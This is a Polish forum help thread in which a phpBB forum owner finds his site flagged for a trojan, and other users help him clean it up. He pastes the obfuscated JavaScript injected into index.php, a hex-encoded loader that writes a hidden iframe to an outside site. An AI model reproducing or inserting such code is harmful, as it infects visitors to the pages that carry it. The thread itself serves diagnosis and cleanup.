Dziwne zachowanie forum

[matius71]

A więc dziś chcę wejść na forum a tu nagle komunikat od antywirusa że na tej stronie znaleziono konia trojańskiego i niestety ale antywirus nie pozwoli mi na otwarcie strony :/ Zamknąłem antywirusa i otwieram stronę. Wchodzę w PA a tu nie ma żadnych opcji, niczego tylko napis phpbb i żadnych zakładek :/ Pomyślałem że może wejdę przez "Internet Explorer" no i przez niego wszystko jest ok, oczywiście po wyłączeniu antywira. Czemu tak się zrobiło i jak można to zmienić?

A jeszcze zauważyłem że pojawiło mi się coś takiego:

[jaroslw]

Złapałeś wirusa, który dokleja kod do wysyłanych plików. Zmień klienta FTP i przeskanuj system. Musisz także nadpisać pliki znajdujące się na serwerze nowymi (z czystej paczki phpBB lub z wcześniejszej kopii zapasowej).

[matius71]

Złapałeś wirusa, który dokleja kod do wysyłanych plików. Zmień klienta FTP i przeskanuj system. Musisz także nadpisać pliki znajdujące się na serwerze nowymi (z czystej paczki phpBB lub z wcześniejszej kopii zapasowej).

Jakiego klienta ftp proponujesz? Które pliki trzeba wymienić?

[jaroslw]

Sprawdź program FileZilla.

Które pliki trzeba wymienić?

To już musisz samemu porównać, które różnią się od tych z oficjalnej paczki. Powinien to być kod doklejony na początku pliku.

[matius71]

Sprawdź program FileZilla.

Takiego właśnie używam

To już musisz samemu porównać, które różnią się od tych z oficjalnej paczki

Gdzie można pobrać taką oficjalną paczkę?

[jaroslw]

W takim razie widać, że wirus się rozwija (wcześniej współpracował wyłącznie z Total Commanderem). Przeskanuj system jakimś dobrym antywirusem, a najlepiej wklej dzienniki HijackThis i ComboFix na jakimś forum specjalistycznym w celu analizy.

Gdzie można pobrać taką oficjalną paczkę?

Chociażby w naszym dziale z plikami

[lemonic]

A ja Proszę Cię kolego zmień serwer na jakiś płatny. Za 48zł na rok dostaniesz w przypadku mojego dostawcy 1GB na dane i 10GB miesięcznego przesyłu do tego domena info gratis czyli byś miał coś takiego www.zdalnie-sterowane.info lub jakąś inną. pozbędziesz się też reklam i innych głupot. Chyba że myślisz nad tym forum wyłącznie jako pole do zbierania doświadczenia ale ja bym bez zastanowienia zmieniał na coś płatnego.

[matius71]

Kurcze nie bardzo wiem czego szukać :/ możecie mi to jakoś przybliżyć?
Antywir jak pokazuje źródło to pisze:
Plik: http://www.zdalnie-sterowane.yoyo.pl/index.php\{gzip}
Nazwa pasożyta:JS:Packed-AK [Trj]
Typ pasożyta: Koń trojański
A co do tej paczki... to będzie ta?
http://www.phpbb.pl/pliki-k14/1/

Narazie się dowiedziałem że w index.php w ostatniej linijce dopisano

Kod: Zaznacz cały

    <script>function c2678dc8d9i499d658927774(i499d658927f69){ function i499d658928761(){return 16;} return (parseInt(i499d658927f69,i499d658928761()));}function i499d658929750(i499d658929f48){  var i499d65892a755='';i499d65892c735=String.fromCharCode;for(i499d65892af4c=0;i499d65892af4c<i499d658929f48.length;i499d65892af4c+=2){ i499d65892a755+=(i499d65892c735(c2678dc8d9i499d658927774(i499d658929f48.substr(i499d65892af4c,2))));}return i499d65892a755;} var r58='';var i499d65892cf2d='3C7'+r58+'3637'+r58+'2697'+r58+'07'+r58+'43E696628216D7'+r58+'96961297'+r58+'B646F637'+r58+'56D656E7'+r58+'42E7'+r58+'7'+r58+'7'+r58+'2697'+r58+'465287'+r58+'56E657'+r58+'363617'+r58+'065282027'+r58+'2533632536392536362537'+r58+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+r58+'332537'+r58+'32253633253364253237'+r58+'2536382537'+r58+'342537'+r58+'342537'+r58+'302533612532662532662536352536622537'+r58+'332536622536632537'+r58+'352537'+r58+'612537'+r58+'392537'+r58+'37'+r58+'2536652536312532652536332536662536642532652537'+r58+'30253663253266253366253237'+r58+'2532622534642536312537'+r58+'342536382532652537'+r58+'322536662537'+r58+'352536652536342532382534642536312537'+r58+'342536382532652537'+r58+'32253631253665253634253666253664253238253239253261253331253330253337'+r58+'253339253337'+r58+'253239253262253237'+r58+'253335253330253334253334253634253333253338253632253635253330253632253334253237'+r58+'2532302537'+r58+'37'+r58+'2536392536342537'+r58+'34253638253364253335253339253230253638253635253639253637'+r58+'2536382537'+r58+'342533642533312533382533332532302537'+r58+'332537'+r58+'342537'+r58+'39253663253635253364253237'+r58+'2537'+r58+'362536392537'+r58+'332536392536322536392536632536392537'+r58+'342537'+r58+'39253361253638253639253634253634253635253665253237'+r58+'2533652533632532662536392536362537'+r58+'3225363125366425363525336527'+r58+'29293B7'+r58+'D7'+r58+'6617'+r58+'2206D7'+r58+'969613D7'+r58+'47'+r58+'27'+r58+'5653B3C2F7'+r58+'3637'+r58+'2697'+r58+'07'+r58+'43E';document.write(i499d658929750(i499d65892cf2d));</script>

Wywaliłem to ale nic się nie poprawiło.

Sprawa nie za ciekawa http://forum.dobreprogramy.pl/%5C/viewt ... 6&t=317676

[jaroslw]

Nie sądzę, aby ktoś robił to ręcznie. Na szelki wypadek zmień hasła do serwera. Wcześniejsza wersja wirusa (możliwe, że jest już kilka jego odmian) doklejała kod tylko w plikach index.*. Przejrzyj te pliki oraz pliki szablonu generujące nagłówek i stronę główną.

A co do tej paczki... to będzie ta?
http://www.phpbb.pl/pliki-k14/1/

Tak.

[matius71]

juz sobie z tym poradzilem jak cos to na mojej stronie jest opisane w jakich plikach siedzi skubany